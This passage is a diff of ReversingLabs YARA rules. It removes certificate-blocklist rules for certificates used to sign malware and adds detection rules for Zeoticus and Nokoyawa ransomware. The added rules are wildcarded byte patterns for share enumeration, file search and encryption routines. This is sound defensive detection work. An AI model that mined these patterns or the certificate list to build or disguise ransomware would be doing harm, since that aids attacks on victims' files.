8B F0 F3 A4 8B C8 BE ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8B C6 5F 5E 5B 8B E5 5D C3 + } + $encrypt_files_v2_p1 = { + 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 56 57 66 90 64 A1 ?? ?? ?? ?? 0F 57 C0 C7 44 24 + ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 0F 13 44 24 ?? 8B 40 ?? 8B 40 ?? 8B 00 8B + 50 ?? A1 ?? ?? ?? ?? 89 54 24 ?? 85 C0 0F 85 ?? ?? ?? ?? 85 D2 0F 84 ?? ?? ?? ?? 8B + 42 ?? 8B 4C 10 ?? 8D 04 11 89 44 24 ?? 3B C2 74 ?? 33 C9 89 4C 24 ?? 39 48 ?? 74 ?? + 8B 40 ?? 03 C2 89 44 24 ?? 0F 1F 80 ?? ?? ?? ?? 8B 30 BF C5 9D 1C 81 8A 04 16 03 F2 + 46 84 C0 74 ?? 0F BE D0 8D 76 ?? 2C ?? 8B CA 83 C9 ?? 3C ?? 8A 46 ?? 0F 47 CA 33 CF + 69 F9 93 01 00 01 84 C0 75 ?? 8B 54 24 ?? 8B 4C 24 ?? 81 FF ?? ?? ?? ?? 74 ?? 8B 74 + 24 ?? 41 8B 44 24 ?? 83 C0 ?? 89 4C 24 ?? 89 44 24 ?? 3B 4E ?? 75 ?? 33 C0 A3 ?? ?? + ?? ?? 6A ?? 8D 4C 24 ?? 51 8D 4C 24 ?? 51 8D 4C 24 ?? 51 FF 35 ?? ?? ?? ?? FF D0 85 + C0 0F 88 ?? ?? ?? ?? 8B 74 24 ?? 85 F6 0F 84 ?? ?? ?? ?? 8B 7C 24 ?? 8B 07 48 83 F8 + ?? 0F 87 ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 8B 74 24 ?? 8B 46 ?? 8D 04 48 0F B7 0C 10 + 8B 46 ?? 8D 04 88 8B 04 10 03 C2 EB ?? 83 7F ?? ?? 0F 85 ?? ?? ?? ?? 83 7F ?? ?? 0F + 85 ?? ?? ?? ?? C7 07 ?? ?? ?? ?? 8B 4C 24 ?? 8B 54 24 ?? 68 ?? ?? ?? ?? 6A ?? 8B 41 + ?? 89 42 ?? 8B 41 ?? 89 42 ?? 8B 44 24 ?? 6A ?? 8B 40 ?? 8D 88 ?? ?? ?? ?? F7 D8 23 + C8 8B 44 24 ?? 89 48 ?? 8D 4C 24 ?? 8B 54 24 ?? 8B 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? + 8D 84 24 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? + ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ?? + 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? FF 76 ?? FF 76 ?? FF 15 ?? ?? ?? ?? 8B 4E + ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 8B 46 ?? 81 C1 ?? ?? ?? ?? 03 C1 50 E8 ?? ?? ?? ?? + 8B 4C 24 ?? 83 C4 ?? 8B 74 24 ?? 89 74 24 ?? 6A ?? 8D 41 ?? 50 FF 71 ?? 8D 41 ?? FF + } + $encrypt_files_v2_p2 = { + 71 ?? 50 51 6A ?? 6A ?? FF 76 ?? E8 ?? ?? ?? ?? FF D0 85 C0 0F 89 ?? ?? ?? ?? 83 C8 + ?? F0 0F C1 46 ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 46 ?? 83 C4 ?? + 33 FF 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 8B 0E E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 76 ?? 47 + 8B 40 ?? 3B F8 72 ?? 8B 74 24 ?? 85 C0 E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 56 ?? 8B C1 + F0 0F B1 0A 83 F8 ?? 75 ?? 8B 46 ?? 89 44 24 ?? 0F B7 46 ?? 83 C0 ?? 8B C8 89 44 24 + ?? E8 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 0F B7 4E ?? 51 FF 76 ?? 8D 4F ?? 51 E8 ?? ?? ?? + ?? 0F B7 46 ?? 83 C4 ?? 89 47 ?? 0F 57 C0 8D 44 24 ?? C6 07 ?? C7 47 ?? ?? ?? ?? ?? + 6A ?? FF 74 24 ?? 66 0F 13 44 24 ?? 57 50 FF 74 24 ?? E8 ?? ?? ?? ?? FF D0 8B CF E8 + ?? ?? ?? ?? 8D 56 ?? 85 F6 0F 84 ?? ?? ?? ?? 83 C8 ?? F0 0F C1 02 0F 85 ?? ?? ?? ?? + 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? 85 C9 0F 84 + ?? ?? ?? ?? 8D 7E ?? 90 8B 0F E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 7F ?? 8B 4E ?? 40 89 44 + 24 ?? 3B C1 72 ?? E9 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 8D 56 ?? 74 ?? 8D 8C 24 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 8B 57 ?? 50 50 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B + C1 6A ?? EB ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 8D 8C 24 ?? ?? ?? ?? 8B + 57 ?? 50 50 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 54 24 ?? 83 C4 ?? 83 7A ?? ?? 8B 42 ?? 0F 8F ?? + ?? ?? ?? 7C ?? 39 42 ?? 0F 87 ?? ?? ?? ?? 8B 74 24 ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? + ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 4E + } + $encrypt_files_v2_p3 = { + 8D 84 24 ?? ?? ?? ?? 83 C4 ?? 81 C1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8B 46 ?? 03 C1 50 + E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? C7 00 ?? ?? ?? ?? EB ?? 8B 44 24 ?? C7 00 ?? ?? + ?? ?? 8B 4C 24 ?? 8B 74 24 ?? 6A ?? 89 74 24 ?? 8D 41 ?? 50 FF 71 ?? 8D 41 ?? FF 71 + ?? 50 51 6A ?? 6A ?? FF 76 ?? E8 ?? ?? ?? ?? FF D0 85 C0 0F 89 ?? ?? ?? ?? 83 C8 ?? + F0 0F C1 46 ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 46 ?? 83 C4 ?? 33 + FF 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 8B 0E E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 76 ?? 47 8B + 40 ?? 3B F8 72 ?? 8B 74 24 ?? 85 C0 E9 ?? ?? ?? ?? 83 C8 ?? F0 0F C1 46 ?? 0F 85 ?? + ?? ?? ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? 85 + C9 0F 84 ?? ?? ?? ?? 8D 7E ?? 66 0F 1F 44 00 ?? 8B 0F E8 ?? ?? ?? ?? 8B 44 24 ?? 8D + 7F ?? 8B 4E ?? 40 89 44 24 ?? 3B C1 72 ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 56 ?? 8B + C1 F0 0F B1 0A 83 F8 ?? 75 ?? 8B 46 ?? 89 44 24 ?? 0F B7 46 ?? 83 C0 ?? 8B C8 89 44 + 24 ?? E8 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 0F B7 4E ?? 51 FF 76 ?? 8D 4F ?? 51 E8 ?? ?? + ?? ?? 0F B7 46 ?? 83 C4 ?? 89 47 ?? 0F 57 C0 8D 44 24 ?? C6 07 ?? C7 47 ?? ?? ?? ?? + ?? 6A ?? FF 74 24 ?? 66 0F 13 44 24 ?? 57 50 FF 74 24 ?? E8 ?? ?? ?? ?? FF D0 8B CF + E8 ?? ?? ?? ?? 8D 56 ?? 85 F6 0F 84 ?? ?? ?? ?? 83 C8 ?? F0 0F C1 02 0F 85 ?? ?? ?? + ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? 85 C9 74 + ?? 8D 7E ?? 8B 0F E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 7F ?? 8B 4E ?? 40 89 44 24 ?? 3B C1 + 72 ?? 85 C9 74 ?? F0 FF 05 ?? ?? ?? ?? F0 FF 0D ?? ?? ?? ?? 8B 46 ?? 85 C0 74 ?? 50 + E8 ?? ?? ?? ?? FF D0 8D 46 ?? 50 E8 ?? ?? ?? ?? FF D0 8B CE E8 ?? ?? ?? ?? E9 ?? ?? + ?? ?? 5F 33 C0 5E 8B E5 5D C2 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Bit9, Inc" and pe.signatures[i].serial=="7c:c1:db:2a:d0:a2:90:a4:bf:e7:a5:f3:36:d6:80:0c" and 1342051200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ((($enum_resources_v1) and ( all of ($find_files_v1_*)) and ( all of ($encrypt_files_v1_*))) or (($check_blacklisted_languages_v2) and ($fnv1a_hashing_v2) and ($create_net_host_trav_threads_v2) and ( all of ($decrypt_configuration_v2_*)) and ( all of ($encrypt_files_v2_p*)))) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_13C8351Aece71C731158980F575F4133 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Zeoticus : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Zeoticus ransomware." author = "ReversingLabs" - id = "b6a1eb97-f0da-571e-951c-57f49cf62057" - date = "2023-11-08" - modified = "2023-11-08" + id = "483b20a4-2c16-5509-a503-2462a53d4d31" + date = "2021-03-19" + modified = "2021-03-19" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L99-L115" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f96723845adc8030b72c119311103d5c2cf136e79de226d31141d8b925ce8e75" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Zeoticus.yara#L1-L90" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "adf42b96139ad98f4253f3eba2c4af1be9545825605e0851185cc15284d9e9a0" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Zeoticus" + tc_detection_factor = 5 importance = 25 + strings: + $enum_shares_p1 = { + 53 55 8B 2D ?? ?? ?? ?? 8B C1 56 57 8B 3D ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? + ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 4C 24 ?? 51 + 8D 4C 24 ?? 51 6A ?? 8D 4C 24 ?? 51 6A ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 85 C0 74 + ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 5C 24 ?? 89 5C 24 ?? C7 44 24 + ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 33 F6 39 73 ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF + 33 FF D5 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 33 FF D5 85 C0 0F 84 ?? ?? ?? ?? + 68 ?? ?? ?? ?? FF 33 FF D5 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 33 FF D5 85 C0 + 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 33 FF D5 85 C0 0F 84 ?? ?? ?? ?? FF 33 8D 44 24 + ?? FF 74 24 ?? 68 ?? ?? ?? ?? 50 FF D7 A1 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 89 04 8D ?? ?? ?? ?? 8D 4C 24 ?? 51 + } + $enum_shares_p2 = { + 50 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D 04 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 56 FF 34 + 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 56 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 04 8D ?? + ?? ?? ?? 41 FF 05 ?? ?? ?? ?? 89 0D ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 FF 85 C0 7E ?? 8D + 5F ?? 8D 44 24 ?? 50 FF 34 BD ?? ?? ?? ?? FF D5 85 C0 0F 44 F3 47 3B 3D ?? ?? ?? ?? + 7C ?? 8B 5C 24 ?? 85 F6 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? + ?? ?? 8B 3D ?? ?? ?? ?? 89 04 8D ?? ?? ?? ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 50 FF D7 + A1 ?? ?? ?? ?? 83 C4 ?? 8D 04 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 6A ?? FF 34 85 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 04 8D ?? ?? + ?? ?? 41 FF 05 ?? ?? ?? ?? 89 0D ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 8B 74 24 ?? 83 + C3 ?? 46 89 5C 24 ?? 89 74 24 ?? 3B 74 24 ?? 0F 82 ?? ?? ?? ?? 8B 5C 24 ?? 53 FF 15 + ?? ?? ?? ?? 81 7C 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 0F 84 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 + ?? ?? ?? ?? C3 + } + $encrypt_files = { + 68 ?? ?? ?? ?? 6A ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ?? ?? + ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B F0 E8 ?? ?? ?? ?? + 83 C4 ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D7 83 + C4 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D + 04 45 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? + FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 83 FB ?? 75 ?? E8 ?? ?? ?? ?? BA ?? ?? + ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? EB ?? 83 FB ?? 75 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? + 56 6A ?? FF 35 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 E8 ?? + ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? FF B4 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? + ?? 83 C4 ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 + } + $find_files = { + 81 EC ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 68 ?? ?? ?? ?? + 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 8D 51 ?? 66 8B 01 + 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 66 83 7C 24 ?? ?? 56 8D 71 ?? 0F 85 ?? ?? ?? ?? + 55 8B 2D ?? ?? ?? ?? 57 8B 3D ?? ?? ?? ?? 66 90 66 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? + 66 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 66 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 66 83 7C 74 + ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 66 89 44 74 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 + 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 4C 74 ?? 85 C0 74 ?? 33 F6 90 + FF 34 B5 ?? ?? ?? ?? FF D7 83 F8 ?? 74 ?? 46 83 FE ?? 72 ?? 8D 44 24 ?? 50 FF 34 B5 + ?? ?? ?? ?? FF D5 68 ?? ?? ?? ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D + 4C 24 ?? 8D 51 ?? 66 90 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 66 83 7C 24 ?? + ?? 8D 71 ?? 0F 84 ?? ?? ?? ?? 5F 5D 53 FF 15 ?? ?? ?? ?? 5E 5B 81 C4 ?? ?? ?? ?? C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Opera Software ASA" and pe.signatures[i].serial=="13:c8:35:1a:ec:e7:1c:73:11:58:98:0f:57:5f:41:33" and 1371513600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ( all of ($enum_shares_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_4531954F6265304055F66Ce4F624F95B : INFO FILE +rule REVERSINGLABS_Win64_Ransomware_Nokoyawa : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Nokoyawa ransomware." author = "ReversingLabs" - id = "da1aaa4c-ac71-5c4c-b663-3d1b57d69040" - date = "2023-11-08" - modified = "2023-11-08" + id = "31470ce4-381f-50d2-bbca-03c592e62a7d" + date = "2022-06-06" + modified = "2022-06-06" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L117-L133" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "58d3a2a5e3f6730f329bddb171ad6332794fa95848825b892c3b8324f503ae89" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win64.Ransomware.Nokoyawa.yara#L1-L104" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "85b7d93db06007d0043b1489b532410ccc700cf082b641fff8a09de2ffe9101d" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Nokoyawa" + tc_detection_factor = 5 importance = 25 + strings: + $enum_shares = { + 48 89 4C 24 ?? 48 81 EC ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? + 48 8D 44 24 ?? 48 89 44 24 ?? 4C 8B 8C 24 ?? ?? ?? ?? 45 33 C0 33 D2 B9 ?? ?? ?? ?? + FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 7C 24 ?? ?? 74 ?? 33 C0 E9 ?? ?? ?? ?? 8B 44 24 ?? + 8B D0 B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 75 ?? 33 C0 + E9 ?? ?? ?? ?? 8B 44 24 ?? 44 8B C0 33 D2 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 4C 8D 4C 24 + ?? 4C 8B 44 24 ?? 48 8D 54 24 ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 7C + 24 ?? ?? 0F 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8B 44 24 ?? FF C0 89 44 24 + ?? 8B 44 24 ?? 39 44 24 ?? 73 ?? 48 8B 44 24 ?? 83 78 ?? ?? 75 ?? 8B 44 24 ?? 48 6B + C0 ?? 48 8B 4C 24 ?? 48 8B 54 01 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? + ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 48 6B C0 + ?? 48 8B 4C 24 ?? 8B 44 01 ?? 83 E0 ?? 83 F8 ?? 75 ?? 8B 44 24 ?? 48 6B C0 ?? 48 8B + 4C 24 ?? 48 03 C8 48 8B C1 48 8B C8 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? EB ?? 81 7C 24 ?? + ?? ?? ?? ?? 74 ?? EB ?? 81 7C 24 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 4C 24 ?? FF + 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 + } + $find_files_p1 = { + FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 83 + E0 ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 + C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 84 + ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? + ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 + 8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? + ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 48 8D 4C 24 + ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? + 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ?? + ?? ?? 74 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? + ?? 3D ?? ?? ?? ?? 75 ?? E9 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48 98 48 8B 8C 24 ?? + ?? ?? ?? 0F B7 04 41 83 F8 ?? 75 ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48 + } + $find_files_p2 = { + 98 48 8B 8C 24 ?? ?? ?? ?? 0F B7 04 41 83 F8 ?? 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C + 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? + E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48 98 48 8B 8C 24 ?? ?? ?? ?? + 0F B7 04 41 83 F8 ?? 75 ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48 98 48 8B + 8C 24 ?? ?? ?? ?? 0F B7 04 41 83 F8 ?? 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 4C + 24 ?? E8 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 15 ?? ?? + ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 85 C0 75 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 85 C0 75 ?? EB ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B 4C + 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 + 81 C4 + } + $encrypt_files = { + 48 89 4C 24 ?? 48 83 EC ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 + 24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? + ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 48 89 44 24 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? B9 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 48 89 44 24 ?? BA ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 54 24 + ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 48 8B 15 ?? ?? ?? ?? 48 8B 4C 24 ?? + E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 41 B8 ?? ?? ?? ?? 33 D2 + 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? + 48 8B 4C 24 ?? 48 89 48 ?? 48 8B 44 24 ?? C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? 48 C7 + 40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? + 48 89 48 ?? 